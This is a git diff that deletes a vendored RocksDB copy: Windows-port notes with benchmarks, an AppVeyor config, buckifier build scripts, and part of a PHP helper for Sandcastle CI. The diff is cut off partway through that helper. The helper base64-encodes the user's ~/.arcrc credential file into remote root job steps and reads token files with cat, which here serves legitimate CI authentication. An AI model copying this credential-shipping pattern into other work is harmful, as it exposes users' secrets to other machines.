-The `use_os_buffer` flag on Posix platforms currently denotes disabling read-ahead log via `fadvise` mechanism. Windows does not have `fadvise` system call. What is more, it implements disk cache in a way that differs from Linux greatly. ItÂ’s not an uncommon practice on Windows to perform un-buffered disk access to gain control of the memory consumption. We think that in our use case this may also be a good configuration option at the expense of disk throughput. To compensate one may increase the configured in-memory cache size instead. Thus we have chosen  `use_os_buffer=false` to disable OS disk buffering for `WinWritableFile` and `WinRandomAccessFile`. The OS imposes restrictions on the alignment of the disk offsets, buffers used and the amount of data that is read/written when accessing files in un-buffered mode. When the option is true, the classes behave in a standard way. This allows to perform writes and reads in cases when un-buffered access does not make sense such as WAL and MANIFEST.
-
-We have replaced `pread/pwrite` with `WriteFile/ReadFile` with `OVERLAPPED` structure so we can atomically seek to the position of the disk operation but still perform the operation synchronously. Thus we able to emulate that functionality of `pread/pwrite` reasonably well. The only difference is that the file pointer is not returned to its original position but that hardly matters given the random nature of access.
-
-We used `SetFileInformationByHandle` both to truncate files after writing a full final page to disk and to pre-allocate disk space for faster I/O thus compensating for the absence of `fallocate` although some differences remain. For example, the pre-allocated space is not filled with zeros like on Linux, however, on a positive note, the end of file position is also not modified after pre-allocation.
-
-RocksDB renames, copies and deletes files at will even though they may be opened with another handle at the same time. We had to relax and allow nearly all the concurrent access permissions possible.
-
-## Thread-Local Storage
-Thread-Local storage plays a significant role for RocksDB performance. Rather than creating a separate implementation we chose to create inline wrappers that forward `pthread_specific` calls to Windows `Tls` interfaces within `rocksdb::port` namespace. This leaves the existing meat of the logic in tact and unchanged and just as maintainable.
-
-To mitigate the lack of thread local storage cleanup on thread-exit we added a limited amount of windows specific code within the same thread_local.cc file that injects a cleanup callback into a `"__tls"` structure within `".CRT$XLB"` data segment. This approach guarantees that the callback is invoked regardless of whether RocksDB used within an executable, standalone DLL or within another DLL.
-
-## Jemalloc usage
-
-When RocksDB is used with Jemalloc the latter needs to be initialized before any of the C++ globals or statics. To accomplish that we injected an initialization routine into `".CRT$XCT"` that is automatically invoked by the runtime before initializing static objects. je-uninit is queued to `atexit()`. 
-
-The jemalloc redirecting `new/delete` global operators are used by the linker providing certain conditions are met. See build section in these notes.
-
-## Stack Trace and Unhandled Exception Handler
-
-We decided not to implement these two features because the hosting program as a rule has these two things in it.
-We experienced no inconveniences debugging issues in the debugger or analyzing process dumps if need be and thus we did not
-see this as a priority.
-
-## Performance results
-### Setup
-All of the benchmarks are run on the same set of machines. Here are the details of the test setup:
-* 2 Intel(R) Xeon(R) E5 2450 0 @ 2.10 GHz (total 16 cores)
-* 2 XK0480GDQPH SSD Device, total 894GB free disk
-* Machine has 128 GB of RAM
-* Operating System: Windows Server 2012 R2 Datacenter
-* 100 Million keys; each key is of size 10 bytes, each value is of size 800 bytes
-* total database size is ~76GB
-* The performance result is based on RocksDB 3.11.
-* The parameters used, unless specified, were exactly the same as published in the GitHub Wiki page. 
-
-### RocksDB on flash storage
-
-#### Test 1. Bulk Load of keys in Random Order
-
-Version 3.11 
-
-* Total Run Time: 17.6 min
-* Fillrandom: 5.480 micros/op 182465 ops/sec;  142.0 MB/s
-* Compact: 486056544.000 micros/op 0 ops/sec
-
-Version 3.10 
-
-* Total Run Time: 16.2 min 
-* Fillrandom: 5.018 micros/op 199269 ops/sec;  155.1 MB/s 
-* Compact: 441313173.000 micros/op 0 ops/sec; 
-
-
-#### Test 2. Bulk Load of keys in Sequential Order
-
-Version 3.11 
-
-* Fillseq: 4.944 micros/op 202k ops/sec;  157.4 MB/s
-
-Version 3.10
-
-* Fillseq: 4.105 micros/op 243.6k ops/sec;  189.6 MB/s 
-
-
-#### Test 3. Random Write
-
-Version 3.11 
-
-* Unbuffered I/O enabled
-* Overwrite: 52.661 micros/op 18.9k ops/sec;   14.8 MB/s
-
-Version 3.10
-
-* Unbuffered I/O enabled 
-* Overwrite: 52.661 micros/op 18.9k ops/sec; 
-
-
-#### Test 4. Random Read
-
-Version 3.11 
-
-* Unbuffered I/O enabled
-* Readrandom: 15.716 micros/op 63.6k ops/sec; 49.5 MB/s 
-
-Version 3.10
-
-* Unbuffered I/O enabled 
-* Readrandom: 15.548 micros/op 64.3k ops/sec; 
-
-
-#### Test 5. Multi-threaded read and single-threaded write
-
-Version 3.11
-
-* Unbuffered I/O enabled
-* Readwhilewriting: 25.128 micros/op 39.7k ops/sec; 
-
-Version 3.10
-
-* Unbuffered I/O enabled 
-* Readwhilewriting: 24.854 micros/op 40.2k ops/sec; 
-
-
-### RocksDB In Memory 
-
-#### Test 1. Point Lookup
-
-Version 3.11
-
-80K writes/sec
-* Write Rate Achieved: 40.5k write/sec;
-* Readwhilewriting: 0.314 micros/op 3187455 ops/sec;  364.8 MB/s (715454999 of 715454999 found)
-
-Version 3.10
-
-* Write Rate Achieved:  50.6k write/sec 
-* Readwhilewriting: 0.316 micros/op 3162028 ops/sec; (719576999 of 719576999 found) 
-
-
-*10K writes/sec*
-
-Version 3.11
-
-* Write Rate Achieved: 5.8k/s write/sec
-* Readwhilewriting: 0.246 micros/op 4062669 ops/sec;  464.9 MB/s (915481999 of 915481999 found)
-
-Version 3.10
-
-* Write Rate Achieved: 5.8k/s write/sec 
-* Readwhilewriting: 0.244 micros/op 4106253 ops/sec; (927986999 of 927986999 found) 
-
-
-#### Test 2. Prefix Range Query
-
-Version 3.11
-
-80K writes/sec
-* Write Rate Achieved:  46.3k/s write/sec
-* Readwhilewriting: 0.362 micros/op 2765052 ops/sec;  316.4 MB/s (611549999 of 611549999 found)
-
-Version 3.10
-
-* Write Rate Achieved: 45.8k/s write/sec 
-* Readwhilewriting: 0.317 micros/op 3154941 ops/sec; (708158999 of 708158999 found) 
-
-Version 3.11
-
-10K writes/sec
-* Write Rate Achieved: 5.78k write/sec
-* Readwhilewriting: 0.269 micros/op 3716692 ops/sec;  425.3 MB/s (837401999 of 837401999 found)
-
-Version 3.10
-
-* Write Rate Achieved: 5.7k write/sec 
-* Readwhilewriting: 0.261 micros/op 3830152 ops/sec; (863482999 of 863482999 found) 
-
-
-We think that there is still big room to improve the performance, which will be an ongoing effort for us.
-
diff --git a/thirdparty/rocksdb/appveyor.yml b/thirdparty/rocksdb/appveyor.yml
deleted file mode 100644
index be9b66b..0000000
--- a/thirdparty/rocksdb/appveyor.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-version: 1.0.{build}
-image: Visual Studio 2015
-before_build:
-- md %APPVEYOR_BUILD_FOLDER%\build
-- cd %APPVEYOR_BUILD_FOLDER%\build
-- cmake -G "Visual Studio 14 2015 Win64" -DOPTDBG=1 -DXPRESS=1 -DPORTABLE=1 ..
-- cd ..
-build:
-  project: build\rocksdb.sln
-  parallel: true
-  verbosity: minimal
-test:
-test_script:
-- ps: build_tools\run_ci_db_test.ps1 -SuiteRun db_basic_test,db_test2,db_test,env_basic_test,env_test -Concurrency 8
-
diff --git a/thirdparty/rocksdb/buckifier/buckify_rocksdb.py b/thirdparty/rocksdb/buckifier/buckify_rocksdb.py
deleted file mode 100644
index a3c8be3..0000000
--- a/thirdparty/rocksdb/buckifier/buckify_rocksdb.py
+++ /dev/null
@@ -1,172 +0,0 @@
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-from targets_builder import TARGETSBuilder
-from optparse import OptionParser
-import os
-import fnmatch
-import sys
-import tempfile
-
-from util import ColorString
-import util
-
-# tests to export as libraries for inclusion in other projects
-_EXPORTED_TEST_LIBS = ["env_basic_test"]
-
-# Parse src.mk files as a Dictionary of
-# VAR_NAME => list of files
-def parse_src_mk(repo_path):
-    src_mk = repo_path + "/src.mk"
-    src_files = {}
-    for line in open(src_mk):
-        line = line.strip()
-        if len(line) == 0 or line[0] == '#':
-            continue
-        if '=' in line:
-            current_src = line.split('=')[0].strip()
-            src_files[current_src] = []
-        elif '.cc' in line:
-            src_path = line.split('.cc')[0].strip() + '.cc'
-            src_files[current_src].append(src_path)
-    return src_files
-
-
-# get all .cc / .c files
-def get_cc_files(repo_path):
-    cc_files = []
-    for root, dirnames, filenames in os.walk(repo_path):
-        root = root[(len(repo_path) + 1):]
-        if "java" in root:
-            # Skip java
-            continue
-        for filename in fnmatch.filter(filenames, '*.cc'):
-            cc_files.append(os.path.join(root, filename))
-        for filename in fnmatch.filter(filenames, '*.c'):
-            cc_files.append(os.path.join(root, filename))
-    return cc_files
-
-
-# Get tests from Makefile
-def get_tests(repo_path):
-    Makefile = repo_path + "/Makefile"
-
-    # Dictionary TEST_NAME => IS_PARALLEL
-    tests = {}
-
-    found_tests = False
-    for line in open(Makefile):
-        line = line.strip()
-        if line.startswith("TESTS ="):
-            found_tests = True
-        elif found_tests:
-            if line.endswith("\\"):
-                # remove the trailing \
-                line = line[:-1]
-                line = line.strip()
-                tests[line] = False
-            else:
-                # we consumed all the tests
-                break
-
-    found_parallel_tests = False
-    for line in open(Makefile):
-        line = line.strip()
-        if line.startswith("PARALLEL_TEST ="):
-            found_parallel_tests = True
-        elif found_parallel_tests:
-            if line.endswith("\\"):
-                # remove the trailing \
-                line = line[:-1]
-                line = line.strip()
-                tests[line] = True
-            else:
-                # we consumed all the parallel tests
-                break
-    
-    return tests
-
-
-# Prepare TARGETS file for buck
-def generate_targets(repo_path):
-    print(ColorString.info("Generating TARGETS"))
-    # parsed src.mk file
-    src_mk = parse_src_mk(repo_path)
-    # get all .cc files
-    cc_files = get_cc_files(repo_path)
-    # get tests from Makefile
-    tests = get_tests(repo_path)
-
-    if src_mk is None or cc_files is None or tests is None:
-        return False
-
-    TARGETS = TARGETSBuilder("%s/TARGETS" % repo_path)
-    # rocksdb_lib
-    TARGETS.add_library(
-        "rocksdb_lib",
-        src_mk["LIB_SOURCES"] +
-        src_mk["TOOL_LIB_SOURCES"])
-    # rocksdb_test_lib
-    TARGETS.add_library(
-        "rocksdb_test_lib",
-        src_mk.get("MOCK_LIB_SOURCES", []) +
-        src_mk.get("TEST_LIB_SOURCES", []) +
-        src_mk.get("EXP_LIB_SOURCES", []),
-        [":rocksdb_lib"])
-    # rocksdb_tools_lib
-    TARGETS.add_library(
-        "rocksdb_tools_lib",
-        src_mk.get("BENCH_LIB_SOURCES", []) +
-        ["util/testutil.cc"],
-        [":rocksdb_lib"])
-
-    # test for every test we found in the Makefile
-    for test in sorted(tests):
-        match_src = [src for src in cc_files if ("/%s.c" % test) in src]
-        if len(match_src) == 0:
-            print(ColorString.warning("Cannot find .cc file for %s" % test))
-            continue
-        elif len(match_src) > 1:
-            print(ColorString.warning("Found more than one .cc for %s" % test))
-            print(match_src)
-            continue
-
-        assert(len(match_src) == 1)
-        is_parallel = tests[test]
-        TARGETS.register_test(test, match_src[0], is_parallel)
-
-        if test in _EXPORTED_TEST_LIBS:
-            test_library = "%s_lib" % test
-            TARGETS.add_library(test_library, match_src, [":rocksdb_test_lib"])
-    TARGETS.flush_tests()
-
-    print(ColorString.info("Generated TARGETS Summary:"))
-    print(ColorString.info("- %d libs" % TARGETS.total_lib))
-    print(ColorString.info("- %d binarys" % TARGETS.total_bin))
-    print(ColorString.info("- %d tests" % TARGETS.total_test))
-    return True
-
-
-def get_rocksdb_path():
-    # rocksdb = {script_dir}/..
-    script_dir = os.path.dirname(sys.argv[0])
-    script_dir = os.path.abspath(script_dir)
-    rocksdb_path = os.path.abspath(
-        os.path.join(script_dir, "../"))
-
-    return rocksdb_path
-
-def exit_with_error(msg):
-    print(ColorString.error(msg))
-    sys.exit(1)
-
-
-def main():
-    # Generate TARGETS file for buck
-    ok = generate_targets(get_rocksdb_path())
-    if not ok:
-        exit_with_error("Failed to generate TARGETS files")
-
-if __name__ == "__main__":
-    main()
diff --git a/thirdparty/rocksdb/buckifier/rocks_test_runner.sh b/thirdparty/rocksdb/buckifier/rocks_test_runner.sh
deleted file mode 100755
index e1f48a7..0000000
--- a/thirdparty/rocksdb/buckifier/rocks_test_runner.sh
+++ /dev/null
@@ -1,4 +0,0 @@
-#!/usr/bin/env bash
-# Create a tmp directory for the test to use
-TEST_DIR=$(mktemp -d /dev/shm/fbcode_rocksdb_XXXXXXX)
-TEST_TMPDIR="$TEST_DIR" $@ && rm -rf "$TEST_DIR"
diff --git a/thirdparty/rocksdb/buckifier/targets_builder.py b/thirdparty/rocksdb/buckifier/targets_builder.py
deleted file mode 100644
index 7d47d2d..0000000
--- a/thirdparty/rocksdb/buckifier/targets_builder.py
+++ /dev/null
@@ -1,65 +0,0 @@
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-import targets_cfg
-import pprint
-
-# TODO(tec): replace this with PrettyPrinter
-def pretty_list(lst, indent=6):
-    if lst is None or len(lst) == 0:
-        return ""
-
-    if len(lst) == 1:
-        return "\"%s\"" % lst[0]
-
-    separator = "\",\n%s\"" % (" " * indent)
-    res = separator.join(lst)
-    res = "\n" + (" " * indent) + "\"" + res + "\",\n" + (" " * (indent - 2))
-    return res
-
-
-class TARGETSBuilder:
-    def __init__(self, path):
-        self.path = path
-        self.targets_file = open(path, 'w')
-        self.targets_file.write(targets_cfg.rocksdb_target_header)
-        self.total_lib = 0
-        self.total_bin = 0
-        self.total_test = 0
-        self.tests_cfg = []
-
-    def __del__(self):
-        self.targets_file.close()
-
-    def add_library(self, name, srcs, deps=None, headers=None):
-        if headers is None:
-            headers = "AutoHeaders.RECURSIVE_GLOB"
-        self.targets_file.write(targets_cfg.library_template % (
-            name,
-            headers,
-            pretty_list(srcs),
-            pretty_list(deps)))
-        self.total_lib = self.total_lib + 1
-
-    def add_binary(self, name, srcs, deps=None):
-        self.targets_file.write(targets_cfg.binary_template % (
-            name,
-            pretty_list(srcs),
-            pretty_list(deps)))
-        self.total_bin = self.total_bin + 1
-
-    def register_test(self, test_name, src, is_parallel):
-        exec_mode = "serial"
-        if is_parallel:
-            exec_mode = "parallel"
-        self.tests_cfg.append([test_name, str(src), str(exec_mode)])
-
-        self.total_test = self.total_test + 1
-
-    def flush_tests(self):
-        self.targets_file.write(targets_cfg.unittests_template % (
-            pprint.PrettyPrinter().pformat(self.tests_cfg)
-        ))
-
-        self.tests_cfg = []
diff --git a/thirdparty/rocksdb/buckifier/targets_cfg.py b/thirdparty/rocksdb/buckifier/targets_cfg.py
deleted file mode 100644
index 33023a5..0000000
--- a/thirdparty/rocksdb/buckifier/targets_cfg.py
+++ /dev/null
@@ -1,124 +0,0 @@
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-rocksdb_target_header = """
-import os
-
-TARGETS_PATH = os.path.dirname(__file__)
-REPO_PATH = "rocksdb/src/"
-BUCK_BINS = "buck-out/gen/" + REPO_PATH
-TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh"
-rocksdb_compiler_flags = [
-  "-fno-builtin-memcmp",
-  "-DROCKSDB_PLATFORM_POSIX",
-  "-DROCKSDB_LIB_IO_POSIX",
-  "-DROCKSDB_FALLOCATE_PRESENT",
-  "-DROCKSDB_MALLOC_USABLE_SIZE",
-  "-DROCKSDB_RANGESYNC_PRESENT",
-  "-DROCKSDB_SCHED_GETCPU_PRESENT",
-  "-DROCKSDB_SUPPORT_THREAD_LOCAL",
-  "-DOS_LINUX",
-  # Flags to enable libs we include
-  "-DSNAPPY",
-  "-DZLIB",
-  "-DBZIP2",
-  "-DLZ4",
-  "-DZSTD",
-  "-DGFLAGS=gflags",
-  "-DNUMA",
-  "-DTBB",
-  # Needed to compile in fbcode
-  "-Wno-expansion-to-defined",
-]
-
-rocksdb_external_deps = [
-  ('bzip2', None, 'bz2'),
-  ('snappy', None, "snappy"),
-  ('zlib', None, 'z'),
-  ('gflags', None, 'gflags'),
-  ('lz4', None, 'lz4'),
-  ('zstd', None),
-  ('tbb', None),
-  ("numa", None, "numa"),
-  ("googletest", None, "gtest"),
-]
-
-rocksdb_preprocessor_flags = [
-  # Directories with files for #include
-  "-I" + REPO_PATH + "include/",
-  "-I" + REPO_PATH,
-]
-
-rocksdb_arch_preprocessor_flags = {
-  "x86_64": ["-DHAVE_SSE42"],
-}
-"""
-
-
-library_template = """
-cpp_library(
-    name = "%s",
-    headers = %s,
-    srcs = [%s],
-    deps = [%s],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-"""
-
-binary_template = """
-cpp_binary(
-  name = "%s",
-  srcs = [%s],
-  deps = [%s],
-  preprocessor_flags = rocksdb_preprocessor_flags,
-  arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-  compiler_flags = rocksdb_compiler_flags,
-  external_deps = rocksdb_external_deps,
-)
-"""
-
-unittests_template = """
-# [test_name, test_src, test_type]
-ROCKS_TESTS = %s
-
-
-# Generate a test rule for each entry in ROCKS_TESTS
-for test_cfg in ROCKS_TESTS:
-    test_name = test_cfg[0]
-    test_cc = test_cfg[1]
-    ttype = "gtest" if test_cfg[2] == "parallel" else "simple"
-    test_bin = test_name + "_bin"
-
-    cpp_binary (
-      name = test_bin,
-      srcs = [test_cc],
-      deps = [":rocksdb_test_lib"],
-      preprocessor_flags = rocksdb_preprocessor_flags,
-      arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-      compiler_flags = rocksdb_compiler_flags,
-      external_deps = rocksdb_external_deps,
-    )
-
-    custom_unittest(
-      name = test_name,
-      type = ttype,
-      deps = [":" + test_bin],
-      command = [TEST_RUNNER, BUCK_BINS + test_bin]
-    )
-
-custom_unittest(
-    name = "make_rocksdbjavastatic",
-    type = "simple",
-    command = ["internal_repo_rocksdb/make_rocksdbjavastatic.sh"],
-)
-
-custom_unittest(
-    name = "make_rocksdb_lite_release",
-    type = "simple",
-    command = ["internal_repo_rocksdb/make_rocksdb_lite_release.sh"],
-)
-"""
diff --git a/thirdparty/rocksdb/buckifier/util.py b/thirdparty/rocksdb/buckifier/util.py
deleted file mode 100644
index 350b733..0000000
--- a/thirdparty/rocksdb/buckifier/util.py
+++ /dev/null
@@ -1,107 +0,0 @@
-"""
-This module keeps commonly used components.
-"""
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-import subprocess
-import os
-import time
-
-class ColorString:
-    """ Generate colorful strings on terminal """
-    HEADER = '\033[95m'
-    BLUE = '\033[94m'
-    GREEN = '\033[92m'
-    WARNING = '\033[93m'
-    FAIL = '\033[91m'
-    ENDC = '\033[0m'
-
-    @staticmethod
-    def _make_color_str(text, color):
-        return "".join([color, text.encode('utf-8'), ColorString.ENDC])
-
-    @staticmethod
-    def ok(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.GREEN)
-
-    @staticmethod
-    def info(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.BLUE)
-
-    @staticmethod
-    def header(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.HEADER)
-
-    @staticmethod
-    def error(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.FAIL)
-
-    @staticmethod
-    def warning(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.WARNING)
-
-    is_disabled = False
-
-
-def run_shell_command(shell_cmd, cmd_dir=None):
-    """ Run a single shell command.
-        @returns a tuple of shell command return code, stdout, stderr """
-
-    if cmd_dir is not None and not os.path.exists(cmd_dir):
-        run_shell_command("mkdir -p %s" % cmd_dir)
-
-    start = time.time()
-    print("\t>>> Running: " + shell_cmd)
-    p = subprocess.Popen(shell_cmd,
-                         shell=True,
-                         stdout=subprocess.PIPE,
-                         stderr=subprocess.PIPE,
-                         cwd=cmd_dir)
-    stdout, stderr = p.communicate()
-    end = time.time()
-
-    # Report time if we spent more than 5 minutes executing a command
-    execution_time = end - start
-    if execution_time > (60 * 5):
-        mins = (execution_time / 60)
-        secs = (execution_time % 60)
-        print("\t>time spent: %d minutes %d seconds" % (mins, secs))
-
-
-    return p.returncode, stdout, stderr
-
-
-def run_shell_commands(shell_cmds, cmd_dir=None, verbose=False):
-    """ Execute a sequence of shell commands, which is equivalent to
-        running `cmd1 && cmd2 && cmd3`
-        @returns boolean indication if all commands succeeds.
-    """
-
-    if cmd_dir:
-        print("\t=== Set current working directory => %s" % cmd_dir)
-
-    for shell_cmd in shell_cmds:
-        ret_code, stdout, stderr = run_shell_command(shell_cmd, cmd_dir)
-        if stdout:
-            if verbose or ret_code != 0:
-                print(ColorString.info("stdout: \n"), stdout)
-        if stderr:
-            # contents in stderr is not necessarily to be error messages.
-            if verbose or ret_code != 0:
-                print(ColorString.error("stderr: \n"), stderr)
-        if ret_code != 0:
-            return False
-
-    return True
diff --git a/thirdparty/rocksdb/build_tools/RocksDBCommonHelper.php b/thirdparty/rocksdb/build_tools/RocksDBCommonHelper.php
deleted file mode 100644
index 9fe770f..0000000
--- a/thirdparty/rocksdb/build_tools/RocksDBCommonHelper.php
+++ /dev/null
@@ -1,377 +0,0 @@
-<?php
-// Copyright 2004-present Facebook. All Rights Reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-// Name of the environment variables which need to be set by the entity which
-// triggers continuous runs so that code at the end of the file gets executed
-// and Sandcastle run starts.
-define("ENV_POST_RECEIVE_HOOK", "POST_RECEIVE_HOOK");
-define("ENV_HTTPS_APP_VALUE", "HTTPS_APP_VALUE");
-define("ENV_HTTPS_TOKEN_VALUE", "HTTPS_TOKEN_VALUE");
-
-define("PRIMARY_TOKEN_FILE", '/home/krad/.sandcastle');
-define("CONT_RUN_ALIAS", "leveldb");
-
-//////////////////////////////////////////////////////////////////////
-/*  Run tests in sandcastle */
-function postURL($diffID, $url) {
-  assert(strlen($diffID) > 0);
-  assert(is_numeric($diffID));
-  assert(strlen($url) > 0);
-
-  $cmd_args = array(
-    'diff_id' => (int)$diffID,
-    'name' => sprintf(
-      'click here for sandcastle tests for D%d',
-      (int)$diffID
-    ),
-    'link' => $url
-  );
-  $cmd = 'echo ' . escapeshellarg(json_encode($cmd_args))
-         . ' | arc call-conduit differential.updateunitresults';
-
-  shell_exec($cmd);
-}
-
-function buildUpdateTestStatusCmd($diffID, $test, $status) {
-  assert(strlen($diffID) > 0);
-  assert(is_numeric($diffID));
-  assert(strlen($test) > 0);
-  assert(strlen($status) > 0);
-
-  $cmd_args = array(
-    'diff_id' => (int)$diffID,
-    'name' => $test,
-    'result' => $status
-  );
-
-  $cmd = 'echo ' . escapeshellarg(json_encode($cmd_args))
-         . ' | arc call-conduit differential.updateunitresults';
-
-  return $cmd;
-}
-
-function updateTestStatus($diffID, $test) {
-  assert(strlen($diffID) > 0);
-  assert(is_numeric($diffID));
-  assert(strlen($test) > 0);
-
-  shell_exec(buildUpdateTestStatusCmd($diffID, $test, "waiting"));
-}
-
-function getSteps($applyDiff, $diffID, $username, $test) {
-  assert(strlen($username) > 0);
-  assert(strlen($test) > 0);
-
-  if ($applyDiff) {
-    assert(strlen($diffID) > 0);
-    assert(is_numeric($diffID));
-
-    $arcrc_content = (PHP_OS == "Darwin" ?
-        exec("cat ~/.arcrc | gzip -f | base64") :
-            exec("cat ~/.arcrc | gzip -f | base64 -w0"));
-    assert(strlen($arcrc_content) > 0);
-
-    // Sandcastle machines don't have arc setup. We copy the user certificate
-    // and authenticate using that in Sandcastle.
-    $setup = array(
-      "name" => "Setup arcrc",
-      "shell" => "echo " . escapeshellarg($arcrc_content) . " | base64 --decode"
-                 . " | gzip -d > ~/.arcrc",
-      "user" => "root"
-    );
-
-    // arc demands certain permission on its config.
-    // also fix the sticky bit issue in sandcastle
-    $fix_permission = array(
-      "name" => "Fix environment",
-      "shell" => "chmod 600 ~/.arcrc && chmod +t /dev/shm",
-      "user" => "root"
-    );
-
-    // Construct the steps in the order of execution.
-    $steps[] = $setup;
-    $steps[] = $fix_permission;
-  }
-
-  // fbcode is a sub-repo. We cannot patch until we add it to ignore otherwise
-  // Git thinks it is an uncommited change.
-  $fix_git_ignore = array(
-    "name" => "Fix git ignore",
-    "shell" => "echo fbcode >> .git/info/exclude",
-    "user" => "root"
-  );
-
-  // This fixes "FATAL: ThreadSanitizer can not mmap the shadow memory"
-  // Source:
-  // https://github.com/google/sanitizers/wiki/ThreadSanitizerCppManual#FAQ
-  $fix_kernel_issue = array(
-    "name" => "Fix kernel issue with tsan",
-    "shell" => "echo 2 >/proc/sys/kernel/randomize_va_space",
-    "user" => "root"
-  );
-
-  $steps[] = $fix_git_ignore;
-  $steps[] = $fix_kernel_issue;
-
-  // This will be the command used to execute particular type of tests.
-  $cmd = "";
-
-  if ($applyDiff) {
-    // Patch the code (keep your fingures crossed).
-    $patch = array(
-      "name" => "Patch " . $diffID,
-      "shell" => "arc --arcrc-file ~/.arcrc "
-                  . "patch --nocommit --diff " . escapeshellarg($diffID),
-      "user" => "root"
-    );
-
-    $steps[] = $patch;
-
-    updateTestStatus($diffID, $test);
-    $cmd = buildUpdateTestStatusCmd($diffID, $test, "running") . "; ";
-  }
-
-  // Run the actual command.
-  $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " .
-           escapeshellarg($test) . "; exit_code=$?; ";
-
-  if ($applyDiff) {
-    $cmd = $cmd . "([[ \$exit_code -eq 0 ]] &&"
-                . buildUpdateTestStatusCmd($diffID, $test, "pass") . ")"
-                . "||" . buildUpdateTestStatusCmd($diffID, $test, "fail")
-                . "; ";
-  }
-
-  // shell command to sort the tests based on exit code and print
-  // the output of the log files.
-  $cat_sorted_logs = "
-    while read code log_file;
-      do echo \"################ cat \$log_file [exit_code : \$code] ################\";
-      cat \$log_file;
-    done < <(tail -n +2 LOG | sort -k7,7n -k4,4gr | awk '{print \$7,\$NF}')";
-
-  // Shell command to cat all log files
-  $cat_all_logs = "for f in `ls t/!(run-*)`; do echo \$f;cat \$f; done";
-
-  // If LOG file exist use it to cat log files sorted by exit code, otherwise
-  // cat everything
-  $logs_cmd = "if [ -f LOG ]; then {$cat_sorted_logs}; else {$cat_all_logs}; fi";
-
-  $cmd = $cmd . " cat /tmp/precommit-check.log"
-              . "; shopt -s extglob; {$logs_cmd}"
-              . "; shopt -u extglob; [[ \$exit_code -eq 0 ]]";
-  assert(strlen($cmd) > 0);
-
-  $run_test = array(
-    "name" => "Run " . $test,
-    "shell" => $cmd,
-    "user" => "root",
-    "parser" => "python build_tools/error_filter.py " . escapeshellarg($test),
-  );
-
-  $steps[] = $run_test;
-
-  if ($applyDiff) {
-    // Clean up the user arc config we are using.
-    $cleanup = array(
-      "name" => "Arc cleanup",
-      "shell" => "rm -f ~/.arcrc",
-      "user" => "root"
-    );
-
-    $steps[] = $cleanup;
-  }
-
-  assert(count($steps) > 0);
-  return $steps;
-}
-
-function getSandcastleConfig() {
-  $sandcastle_config = array();
-
-  $cwd = getcwd();
-  $cwd_token_file = "{$cwd}/.sandcastle";
-  // This is a case when we're executed from a continuous run. Fetch the values
-  // from the environment.
-  if (getenv(ENV_POST_RECEIVE_HOOK)) {
-    $sandcastle_config[0] = getenv(ENV_HTTPS_APP_VALUE);
-    $sandcastle_config[1] = getenv(ENV_HTTPS_TOKEN_VALUE);
-  } else {
-    // This is a typical `[p]arc diff` case. Fetch the values from the specific
-    // configuration files.
-    for ($i = 0; $i < 50; $i++) {
-      if (file_exists(PRIMARY_TOKEN_FILE) ||
-          file_exists($cwd_token_file)) {
-        break;
-      }
-      // If we failed to fetch the tokens, sleep for 0.2 second and try again
-      usleep(200000);
-    }
-    assert(file_exists(PRIMARY_TOKEN_FILE) ||
-           file_exists($cwd_token_file));
-
-    // Try the primary location first, followed by a secondary.
-    if (file_exists(PRIMARY_TOKEN_FILE)) {
-      $cmd = 'cat ' . PRIMARY_TOKEN_FILE;
-    } else {
-      $cmd = 'cat ' . escapeshellarg($cwd_token_file);
-    }
-
-    assert(strlen($cmd) > 0);
-    $sandcastle_config = explode(':', rtrim(shell_exec($cmd)));
-  }
-
-  // In this case be very explicit about the implications.
-  if (count($sandcastle_config) != 2) {
-    echo "Sandcastle configuration files don't contain valid information " .
-         "or the necessary environment variables aren't defined. Unable " .
-         "to validate the code changes.";
-    exit(1);
-  }
-
-  assert(strlen($sandcastle_config[0]) > 0);
-  assert(strlen($sandcastle_config[1]) > 0);
-  assert(count($sandcastle_config) > 0);
-
-  return $sandcastle_config;
-}
-
-// This function can be called either from `[p]arc diff` command or during
-// the Git post-receive hook.
- function startTestsInSandcastle($applyDiff, $workflow, $diffID) {
-  // Default options don't terminate on failure, but that's what we want. In
-  // the current case we use assertions intentionally as "terminate on failure
-  // invariants".
-  assert_options(ASSERT_BAIL, true);
-
-  // In case of a diff we'll send notificatios to the author. Else it'll go to
-  // the entire team because failures indicate that build quality has regressed.
-  $username = $applyDiff ? exec("whoami") : CONT_RUN_ALIAS;
-  assert(strlen($username) > 0);
-
-  if ($applyDiff) {
-    assert($workflow);
-    assert(strlen($diffID) > 0);
-    assert(is_numeric($diffID));
-  }
-
-  // List of tests we want to run in Sandcastle.
-  $tests = array("unit", "unit_non_shm", "unit_481", "clang_unit", "tsan",
-                 "asan", "lite_test", "valgrind", "release", "release_481",
-                 "clang_release", "clang_analyze", "code_cov",
-                 "java_build", "no_compression", "unity", "ubsan");
-
-  $send_email_template = array(
-    'type' => 'email',
-    'triggers' => array('fail'),
-    'emails' => array($username . '@fb.com'),
-  );
-
-  // Construct a job definition for each test and add it to the master plan.
-  foreach ($tests as $test) {
-    $stepName = "RocksDB diff " . $diffID . " test " . $test;
-
-    if (!$applyDiff) {
-      $stepName = "RocksDB continuous integration test " . $test;
-    }
-
-    $arg[] = array(
-      "name" => $stepName,
